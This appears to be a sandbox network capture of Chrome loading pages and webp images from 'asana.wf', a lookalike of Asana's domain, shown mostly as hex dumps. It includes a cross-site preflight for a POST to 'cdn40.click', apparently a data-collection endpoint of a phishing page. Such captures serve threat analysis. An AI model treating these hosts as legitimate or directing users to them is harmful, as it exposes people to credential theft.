                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "6786-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 26502
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 7e 67 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 2f 03 00 41 4c 50 48 cb 01 00 00 01 90 55 db b6 dd 36 07 82 21 5c 28 42 92 04 41 24 06 0a 92 b4 08 2c 06 32 03 9b c9 15 83 73 fb cc 3b 5f e7 63 46 c4 04 c4 4b 4f f3 8f db 31 ca e1 71 db ee 5b bc e9 74 19 85 71 9b 5e d7 2e a3 38 9e db 2b e6 63 94 c7 be bc 68 1d 15 32 d7 17 ac a3 46 e6 fa 9f 79 54 c9 5c fe d1 8e 32 31 7a fb 6b 1b 85 72 8f 88 69 54 ca 9c 22 2e a5 62 ec d1 46 ad cc d3 43 b5 58 b6 62 31 9e 6f d5 e2 7a 54 8b 3e aa 65 f2 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff f1 1f ff
                                                                                                                                                                                                                    Data Ascii: RIFF~gWEBPVP8X//ALPHU6!\(BA$,2s;_cFKO1q[tq^.8+ch2FyT\21zkriT".bFCXb1ozT>e
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: 7e 71 3b ae 53 ff 92 d4 20 87 6d e9 9c e8 a6 f5 1b 5d fd e4 06 0c 8a 00 81 f3 d9 84 87 e4 2b cc e3 da 5d 4d 63 0e ee 25 97 73 0d 3d a9 70 e1 f5 e7 4f 70 ce ba 10 f1 f4 42 bf cc db a9 ba 68 a9 9d 01 ba 1c 12 22 73 63 52 69 cf 0a 3e 2c be 25 ce 38 4d 10 ac 97 00 f0 a6 83 96 f8 0d 6e 18 a7 46 86 b0 75 8d 45 bd ff 2a 29 b9 ed 25 79 44 72 7b 28 83 24 01 47 79 ed 82 89 30 e2 43 6a b7 35 47 54 bb c7 a1 de d4 f5 ca ce 7b d3 94 ac 4d b2 ba 96 bf eb 2c 9e b8 cb 7e a7 82 e3 a2 c7 a2 3c a1 30 da 9d 6d 1d 71 58 45 9b e9 00 12 36 c3 30 45 b6 8e 44 35 ce d6 a0 3d 74 44 cf 67 3e 74 71 16 80 7b 0a b6 21 96 0e 05 58 4b 96 05 9c ae a7 e6 ea 83 ee 3b 31 a6 70 8f 9e 3b 56 64 66 61 c8 49 bb f2 c2 a7 2e 35 08 5e 2e 01 7e e2 5b ac 4a ac 53 70 c2 4d d8 d9 95 7a 19 e4 aa 54 0f b1
                                                                                                                                                                                                                    Data Ascii: ~q;S m]+]Mc%s=pOpBh"scRi>,%8MnFuE*)%yDr{($Gy0Cj5GT{M,~<0mqXE60ED5=tDg>tq{!XK;1p;VdfaI.5^.~[JSpMzT
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: d8 b1 e2 39 2a ac a6 1f 1b 8b d5 44 b9 d0 3a 7a c4 9e d7 f2 76 68 87 2d 7d e0 ab 02 6f d3 f6 90 d8 30 d7 03 62 49 e9 84 fc d9 9b 8e fb 52 b0 e4 b8 fb d0 50 ef 4a 86 e6 f3 db 3a 7c 18 e7 0a 31 a3 18 be c2 83 90 65 85 da 4b 4d eb 9b 38 91 44 5a 27 83 72 ce a1 63 3f 8a 8c 76 41 4a 47 15 28 cc 51 24 be 64 ba bd ed c3 10 61 d9 68 91 3e 92 b6 c6 40 a4 8d 49 fa a5 d2 e1 df c6 34 2e fc 7a 21 53 3a ca 76 43 85 0d 54 fa e8 4d 7e db 4c e3 86 b0 7f 25 fe 83 58 63 bb 46 bc 13 95 7d e8 cb 5d d7 74 7f 5c 45 a8 c9 7c 57 a6 95 6c 96 53 82 a5 13 7b 84 77 d2 96 c9 88 38 e3 f8 02 05 c4 ca 4a 57 cc fe 04 09 87 88 34 73 83 98 a4 6d 7a dc e4 2e 87 9f 8f 78 1b 0f 47 13 d1 88 7f c8 ee b4 84 17 b7 9e f6 02 4f 09 88 d1 87 9b 2d d5 08 19 0c 73 ba ec a6 fe 5b 22 33 da eb 4a 12 f3 02
                                                                                                                                                                                                                    Data Ascii: 9*D:zvh-}o0bIRPJ:|1eKM8DZ'rc?vAJG(Q$dah>@I4.z!S:vCTM~L%XcF}]t\E|WlS{w8JW4smz.xGO-s["3J
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC2536INData Raw: 7b 8c 6b 31 db 98 4a 24 34 56 35 a1 a3 43 be 7b d2 2d ab 11 0e 20 1b b2 62 58 b9 38 b0 27 7e c4 02 4e b3 46 30 f3 b4 19 52 88 02 71 10 5e bc c9 f9 79 c4 b6 df f8 d4 44 83 d6 b3 35 8e c4 54 67 29 e6 e8 83 ed f7 32 83 1a 85 eb 28 d5 dd 4f 65 99 38 21 3f 4e 31 32 00 97 24 ba c4 23 7e ea b3 ed 5d a6 86 03 b2 d3 97 fb 93 2e ba 42 12 78 78 95 b4 6c 71 77 ca 76 df 08 cf 01 3e 16 68 7e 4f 47 d8 ac 2e 69 51 ea 5b 29 1c bd 70 ce 50 cf 9e 4e bd 42 17 d7 29 24 57 74 1a 8c 64 e1 11 fb a9 b6 ef 2f f1 c5 ad e6 94 5a 4a 9d 66 be 71 2d d6 21 54 61 27 97 87 e1 07 4f 1c 52 bb 83 6e 22 90 5f 19 93 9d be 45 79 59 d8 26 5d 79 d2 b7 33 ed 8f c9 62 14 8a c6 fd 50 39 f8 73 e3 b3 7a a7 fd 99 ef f2 c6 3e 72 d6 41 89 a5 ce ef bc 5f 10 86 d7 dc e8 eb 34 c4 87 4e 0d 9e 52 da 09 c3 71
                                                                                                                                                                                                                    Data Ascii: {k1J$4V5C{- bX8'~NF0Rq^yD5Tg)2(Oe8!?N12$#~].Bxxlqwv>h~OG.iQ[)pPNB)$Wtd/ZJfq-!Ta'ORn"_EyY&]y3bP9sz>rA_4NRq


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    34192.168.2.164974094.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC353OUTGET /img/card-hubspot.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "40a4-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 16548
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 9c 40 00 00 57 45 42 50 56 50 38 20 90 40 00 00 70 37 01 9d 01 2a 30 02 75 01 3e 91 40 9c 4b a5 a3 26 2c a3 10 3b 41 90 12 09 67 6e 8e ff 33 e8 4e 77 37 70 03 4f 03 af 7c 49 08 22 9c 00 8f 2a 18 ab a7 de 05 1a 00 fa d6 d3 d2 67 cc 3f 9f ff 7d fb 15 e6 cf e7 fd 75 38 5b f8 2f 06 fb 3b f6 73 f3 eb 50 87 b7 da 41 85 fe 14 ff 4b e8 5b 88 b3 f2 de a1 bf a7 fd 64 bf e9 f2 af fb 1f a8 5f 97 77 b3 cf df 1f 66 af db 02 1c 41 f1 ff 4f 5f 59 34 95 e6 22 33 49 ec c1 1d 94 0e bf 32 93 d5 5d c6 f2 9d f3 f2 38 c1 f9 d8 78 0a 41 4b 5e 01 f5 c7 89 0e 89 fe 97 25 aa 5b c7 91 db 94 f9 e8 7f fc 8a 05 be ec fb cc 5f fc 46 9d 99 58 c7 76 ab ff ab 36 1b b0 6e 4e 50 bd af 2e d1 df d2 b5 65 1e b9 9f e4 44 5f 55 a9 ea e5 df b8 64 69 fa 93 ee 6a 7f fc 42 96 4b 34 20 b4
                                                                                                                                                                                                                    Data Ascii: RIFF@WEBPVP8 @p7*0u>@K&,;Agn3Nw7pO|I"*g?}u8[/;sPAK[d_wfAO_Y4"3I2]8xAK^%[_FXv6nNP.eD_UdijBK4
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC8000INData Raw: 49 12 18 d9 c3 6d 07 be 45 8a 98 e2 1b e6 92 7a 9c f4 93 7c a5 88 97 45 63 af 95 18 9f 35 23 0e 8c f4 9c ff 59 b9 46 99 b4 6e 46 a4 9a 48 2a 27 73 06 39 15 45 37 80 5f 6b c3 12 4a f1 10 1a d9 e9 84 de d5 8e 25 25 8d 4a 34 a7 20 2b 2c 0d 2d e1 8d fc ee d9 19 0f 1e b2 b1 b0 f1 9c e1 c6 ad 03 94 f1 fc 97 ec 3f 15 be 05 1b d4 70 6e 7e 92 1c 81 c5 c6 91 48 b7 d8 77 3c 58 f2 e5 9f 92 f5 29 2b 95 13 70 d0 55 63 f1 f5 2e 5e 89 d4 65 ef 07 e2 f5 e9 4e 3c a2 2e 99 0b 76 dd a4 2c f3 e6 3b f9 6c 96 46 4f 48 4c 96 6b 0f e8 f1 5e 4c f1 20 52 45 11 66 fb a9 8c 3d 30 8b 0d 60 8c 4e ff 75 a5 fe b7 b6 8e 2b dc 18 84 8f 42 22 8b 6f 0b 81 c6 dc 3f 72 72 d0 76 56 d5 fb bc 03 5b 4d 33 33 b6 f1 d0 6d 31 a2 08 2f 43 35 56 8c d7 d0 c1 74 77 2b d5 e8 89 2d af 5e b3 bd 16 b0 84 c8
                                                                                                                                                                                                                    Data Ascii: ImEz|Ec5#YFnFH*'s9E7_kJ%%J4 +,-?pn~Hw<X)+pUc.^eN<.v,;lFOHLk^L REf=0`Nu+B"o?rrvV[M33m1/C5Vtw+-^
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC582INData Raw: 06 ad f0 80 bd af d3 bc b1 f5 72 75 41 02 b9 13 d5 b5 89 26 18 23 ec 31 ca 8e d2 c7 cd d1 cb da c7 58 8d e9 47 fd df 83 45 95 4d 0f b4 df 13 60 00 00 fe 1d 44 de dd ab 32 88 a8 64 02 16 de 25 4c 8c 54 37 85 59 b6 84 b2 9f 6e 4e 17 19 3e 09 bb 50 c4 6a 01 44 bf 34 1d c4 08 27 5c 8a 15 a5 e9 62 7b 8d a5 bd d2 f5 e0 aa c3 08 da 20 5d 88 a4 c9 cf a0 91 e8 64 a5 3c 59 14 c1 51 6a 07 b6 71 27 61 6e 63 a5 9a ad eb 5a 97 31 94 72 96 46 46 ae 85 41 dd 65 3a 69 30 c3 df 2d 11 1f c4 63 f8 a0 ad 2f e0 2c 60 c2 f0 54 da 17 ad 50 38 f6 b2 22 07 f4 ed 8b f1 8f b2 3e a2 f9 a6 b3 46 e1 a7 a8 c5 b5 54 05 04 be d2 b2 e2 65 aa fb f7 e8 ee 08 99 7f 60 64 aa f3 90 55 45 28 a5 10 71 c7 f4 71 f5 a9 6a 20 e7 6f 09 0c 31 d5 4a 45 1d 22 e3 d5 f7 2f 14 3f 95 71 ca 1e 8d d4 5c 6c 77
                                                                                                                                                                                                                    Data Ascii: ruA&#1XGEM`D2d%LT7YnN>PjD4'\b{ ]d<YQjq'ancZ1rFFAe:i0-c/,`TP8">FTe`dUE(qqj o1JE"/?q\lw


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    35192.168.2.164974323.133.88.1904432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC555OUTOPTIONS /9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95 HTTP/1.1
                                                                                                                                                                                                                    Host: cdn40.click
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                    Origin: https://asana.wf
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC423INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    X-Powered-By: Express
                                                                                                                                                                                                                    allow: OPTIONS, POST
                                                                                                                                                                                                                    access-control-allow-origin: https://asana.wf
                                                                                                                                                                                                                    access-control-allow-headers: content-type
                                                                                                                                                                                                                    access-control-allow-methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
                                                                                                                                                                                                                    vary: Origin
                                                                                                                                                                                                                    ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    36192.168.2.164974294.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC370OUTGET /img/card-overstock-asana-customer.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "3b22-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 15138
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7966INData Raw: 52 49 46 46 1a 3b 00 00 57 45 42 50 56 50 38 20 0e 3b 00 00 70 59 01 9d 01 2a 30 02 75 01 3e 91 40 9c 4b a5 a3 22 af 21 f0 fb 61 e0 12 09 67 6e 89 37 17 75 7c 4a fd 7c bf 77 d3 fa f2 62 c7 a8 2a 6b 3e 59 ae af b2 ad d0 75 9e 41 57 95 ef 9f 76 27 f9 ef 5d 96 1b fe 0b c1 8e cb fd bb fe bb c4 8f fe bd fb 83 05 96 d7 d2 34 3c 67 1f f7 df 50 af e5 5f e9 bd 62 3c 27 fe c1 ea 31 fb 0b d6 7b f7 63 d8 a3 f6 a8 10 2d 96 1b 52 3c d9 cb 54 72 57 ea d2 5b 27 b2 47 3b ea b7 19 c6 c8 9d 65 22 91 0d aa e2 16 45 a4 17 77 ea cd fc 32 2a 0e 22 ab 7c 55 e3 0d 00 c5 13 9b e5 1e dd 1e 2b 57 e0 8b c0 4e ec cf 7f 70 4a 87 ef 2e 8d c0 ed 52 db 42 de e6 ca c9 9d 69 86 b3 59 e8 8a 3b 32 88 6c 24 f2 d8 57 91 90 b4 61 75 cc 46 b2 bd 3e d5 c9 82 53 63 d0 da 5c 73 4f 2d e9 ec d1 f5 fd
                                                                                                                                                                                                                    Data Ascii: RIFF;WEBPVP8 ;pY*0u>@K"!agn7u|J|wb*k>YuAWv']4<gP_b<'1{c-R<TrW['G;e"Ew2*"|U+WNpJ.RBiY;2l$WauF>Sc\sO-
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7172INData Raw: a3 f4 52 9d 88 06 e6 5c 30 95 74 17 2d 2c 51 a2 71 03 bb f9 21 fc 4c ab 4a dc db 95 f3 a5 34 83 70 30 cf e4 f9 9a e9 81 66 dc d3 e0 28 46 9d cb ca 9e 4c 80 27 1b cc 32 2f e2 b7 73 29 06 6e e4 50 97 65 47 fa e3 05 ba 2d 04 06 88 17 e4 60 8a 4c d0 49 86 a0 1f 86 0b 6d fd 12 88 7a b6 13 35 ba b6 f5 65 dd b9 53 9a 76 e4 5e 6a 0d a0 f0 d3 5b fc 8e b7 56 fa 28 26 bc 21 8e 0c 28 8c d0 87 c7 a8 c7 7a 60 76 3c c2 26 ed ce 92 e9 22 76 e7 ad f0 da 71 7a 8a 9e 59 05 c5 d5 ea a9 dc 4d a3 c2 5a d5 8f 87 55 cd 57 1b 7a 9b 4d ad 50 e6 5a 8e 18 f6 84 3c c6 c5 3b 30 c7 60 e9 31 f5 6e cd 1c 64 e2 dd 6e 5f c4 47 93 3e d4 23 bc a5 de 60 ae 23 4a 96 d2 8e d9 b2 a4 69 96 7d 00 da dd 43 22 ce ab 34 17 63 ca 02 c7 5a ec ac 51 a9 3b 5f 8b 03 9f ed 2c 56 ba e3 07 92 9f 11 c2 21 97
                                                                                                                                                                                                                    Data Ascii: R\0t-,Qq!LJ4p0f(FL'2/s)nPeG-`LImz5eSv^j[V(&!(z`v<&"vqzYMZUWzMPZ<;0`1ndn_G>#`#Ji}C"4cZQ;_,V!


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    37192.168.2.164974194.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC596OUTGET /img/home24-templates-thumbnail.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "3dd6-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 15830
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7966INData Raw: 52 49 46 46 ce 3d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 2f 03 00 41 4c 50 48 af 01 00 00 01 80 15 49 92 ad 6a 24 20 61 a5 1c 29 38 60 1d 80 13 ae 83 c5 c1 91 70 a4 ac 04 de 87 fb df 1f 19 11 13 50 7b 0f fd ba cd 7b 1c ce 6d 1c 5b fd eb b2 de 83 71 2c bf b5 f5 1e 8e a3 fd 70 9a f7 78 9c 7d d7 f9 1e 91 e7 1d e7 7b 48 9e bf 9c ee 31 d9 3f b4 99 13 b3 bd 8d 7b 50 ae 55 b5 dc a3 72 a9 1a 59 b1 56 bb 87 e5 e1 98 16 7d a4 c5 75 4b 8b 6d a6 c5 bc f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff f3 3f ff
                                                                                                                                                                                                                    Data Ascii: RIFF=WEBPVP8X//ALPHIj$ a)8`pP{{m[q,px}{H1?{PUrYV}uKm?????????????????????????????????
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC7864INData Raw: ec 07 24 3b 9d b3 f9 f1 a2 49 7a 0a cc 56 57 3a 8a 13 f5 be a2 4b cd 63 c7 4b 44 a3 2f a0 db 40 52 8e 8d e0 8b 71 dc cd 81 9e 7c 97 52 89 97 02 23 49 7e 04 db 1c 38 7e 67 c0 2b 95 c8 37 e0 ae 43 12 8e 3b da 66 31 3d 1e 77 27 63 62 f6 74 63 01 67 04 dd 32 e0 c3 82 b4 73 99 92 e8 c5 67 ea 67 96 4d 07 32 aa 8c 98 ca 17 8d fa 19 f5 7a d8 fa ae 3f b8 1e 35 81 ba a5 a2 ff 91 b4 98 4f fa 5d 41 94 43 21 2f 3a 51 93 71 e7 29 41 cf a2 75 b4 01 b3 d8 64 05 b4 40 bc 2a 79 03 ab 5b aa 8f 95 16 3d c5 a3 a7 7d fd 8f 2e a5 f1 2b 16 2a 70 94 b9 67 3b 52 6b 32 5e 00 66 d3 3c e2 29 6c 43 01 b3 cb 9d 75 de dd b4 10 07 59 7c cc 16 42 69 75 6d 80 04 8c d8 19 79 e6 b8 f0 e0 52 55 1d 3d 1b fe b1 7b ce c0 ce c8 13 e3 bf 99 8c e9 fe 91 40 83 ea cf 84 c6 15 c7 55 c4 c9 e3 d2 d3 91
                                                                                                                                                                                                                    Data Ascii: $;IzVW:KcKD/@Rq|R#I~8~g+7C;f1=w'cbtcg2sggM2z?5O]AC!/:Qq)Aud@*y[=}.+*pg;Rk2^f<)lCuY|BiumyRU={@U


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    38192.168.2.164974594.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC602OUTGET /img/HOME24-web-hero-gartner-2x-en-US.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC224INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "d9c-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 3484
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC3484INData Raw: 52 49 46 46 94 0d 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 2f 03 00 1f 02 00 41 4c 50 48 e8 00 00 00 01 67 60 20 92 cc a4 4f 60 1b d0 80 88 88 f2 db b9 0c 00 4e b5 6d cb 9b 27 cc b0 66 8b 00 14 80 12 62 83 a4 f0 c4 49 3b 75 42 01 9d 98 3e 57 51 f0 94 ee 88 fe 4f 80 a4 ea 55 30 e3 30 a6 f3 fe 57 b0 e3 75 4c 52 f9 3d 18 72 12 91 56 c1 92 15 e9 d5 13 53 b5 82 29 13 97 ae c8 3d b9 a2 f6 ea 8a c9 87 2b ae 03 fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff e3 7f fc 8f ff f1 3f fe c7 ff f8 1f ff ff 48 fd 74 c5 e1 cd 15 93 47 57 b4 ef 5d 91 1d b8 22 a6 77 4f 4c a4 95 27 2a 52 f9 cd 11 d3
                                                                                                                                                                                                                    Data Ascii: RIFFWEBPVP8X/ALPHg` O`Nm'fbI;uB>WQOU00WuLR=rVS)=+??????HtGW]"wOL'*R


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    39192.168.2.164974694.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC604OUTGET /img/HOME24-web-hero-forrester-2x-en-US.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:59 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:59 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "1d3e-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 7486
                                                                                                                                                                                                                    Connection: close
